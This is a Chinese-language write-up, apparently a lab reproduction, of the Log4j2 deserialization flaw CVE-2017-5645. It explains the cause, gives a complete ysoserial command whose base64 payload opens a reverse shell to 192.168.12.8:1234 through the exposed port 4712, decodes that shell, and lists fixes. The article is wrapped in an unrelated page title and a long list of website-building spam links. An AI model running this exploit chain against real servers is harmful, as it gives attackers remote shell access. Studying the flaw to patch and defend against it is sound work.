当前位置: 首页 > wzjs >正文

公司建一个网站多少费用ftp网站服务器

公司建一个网站多少费用,ftp网站服务器,海南省住房和城乡建设局网站,宁波网站制作报价介绍: 是一个与 Apache Log4j2 相关的安全漏洞,属于远程代码执行,它可能允许攻击者通过构造恶意的日志信息 在目标系统上执行任意代码 Log4j2 介绍 Log4j2 是 Apache 的一个日志记录工具,属于 Java 应用的日志框架,它是 Log4j 的升级版,性能更好,功能更多.它被广泛的适用于 J…

介绍:

是一个与 Apache Log4j2 相关的安全漏洞,属于远程代码执行,它可能允许攻击者通过构造恶意的日志信息 在目标系统上执行任意代码

Log4j2 介绍

Log4j2 是 Apache 的一个日志记录工具,属于 Java 应用的日志框架,它是 Log4j 的升级版,性能更好,功能更多.它被广泛的适用于 Java 应用程序中,帮助开发者记录程序运行的时候的日子信息,是 Java 生态系统中最重要的一个日志框架之一

  • 漏洞编号: CVE-2017-5645
  • 漏洞类型:远程代码执行(RCE)
  • 收影响组件:Apache log4j
  • 漏洞触发原理:
    • Log4j2 支持通过 SocketAppender 或者 SocketHubAppender 接受远程日志信息
    • 在处理这些日志信息的时候 Log4j2 会对信息进行反序列化操作
    • 由于未对反序列化数据进行检查,攻击者可以构造恶意的序列化对象,嵌入恶意代码
    • 当系统中处理这些恶意日志消息的时候,会触发反序列漏洞,从而导致任意代码执行
  • 漏洞利用:

    • 环境起来以后将会在 4712 端口开一个 tcp 服务,使用ysoserial生成 payload 发送到 4712 端口即可!

ysoserial 介绍

ysoserial 是一个用于生成 Java 反序列化漏洞利用代码的开源工具

 工具地址:
https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

    • 直接利用 4712 端口的 TCP 服务反弹 shell 即可
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjgvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.100.102 4712

详细介绍

使用base64解码:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjgvMTIzNCAwPiYx

结果为:bash -i >& /dev/tcp/192.168.12.8/1234 0>&1

bash -i 是一个启动交互式的 bashh shell

>& /dev/tcp/..... 将 shell 的输入/输出重定向到 Tcp 套接字

0>&1 将标准输入(文件描述 0)和标准输出(文件描述 1)合并,并且实现双向通信

这里可以看到,反弹shell 直接拿下!

  • 修复建议:
    • 升级到安全版本,升级到 log4j 2.8.2 或者更高的版本
    • 禁用反序列化功能
      • 如果无法立即升级,可以通过配置 log4j 的反序列化功能
    • 限制网络访问
    • 监控日志分析

总结:

要理解原理,理解原理之后再去复现就会有更加深入的理解!

http://www.dtcms.com/wzjs/788623.html

相关文章:

  • 温州网站设计只找亿企邦长治网站设计制作网站
  • 企业网站建站意义建设科技期刊官网
  • 网站关键词快排名备案网站多少钱
  • 网站建设与管理属于计算机专业吗深圳网站建 1设骏域网站建设
  • 义乌网站设计学校部门网站建设
  • 零食网站的网站功能模块网络推广有几种方式
  • 国外网站建设的发展wordpress 关键词描述
  • 网站入口百度杭州做网站的好公司哪家好
  • 网站建设公司怎么寻找客户呢成都设计平台
  • 深圳龙岗做网站公司哪家好猪八戒做网站排名
  • 网站做哪个编程在线教育好
  • wordpress 用什么编辑器seo软件简单易排名稳定
  • 做设计什么网站平台好点做私活刘连康seo培训哪家强
  • 手机网站开发 c做移动网站设计
  • 电商平台设计包括哪些内容如何优化网站加载速度
  • 怎么制定网站做网站泉州
  • 教育培训网站建设ppt模板东莞网站建设方案
  • 做最漂亮的网站wordpress vip可见
  • 极构网站建设工作室河北省水利建设市场网站
  • 初中生怎样做网站赚钱专门培训seo的网站
  • 网站建设分什么行业织梦网站文章相互调用
  • mm131网站用什么软件做的扬中潘杰
  • 做海报挣钱的网站包括搜索引擎排名、网页标签优化、相关链接交换、网络广告投放等
  • 目前专业做水果的网站有哪些国外最大的素材网站
  • 网站备案信息更改审核要多久网页制作总结报告
  • 广东省网站建设开发app找什么公司
  • 惠州有没有做网站做商城网站需要什么条件
  • 安徽省六安市城乡建设厅网站怎样自建网站
  • cdr做网站怎么导出2017 上海网站备案
  • 山西威力网站建设推荐做网站需要写配置文件吗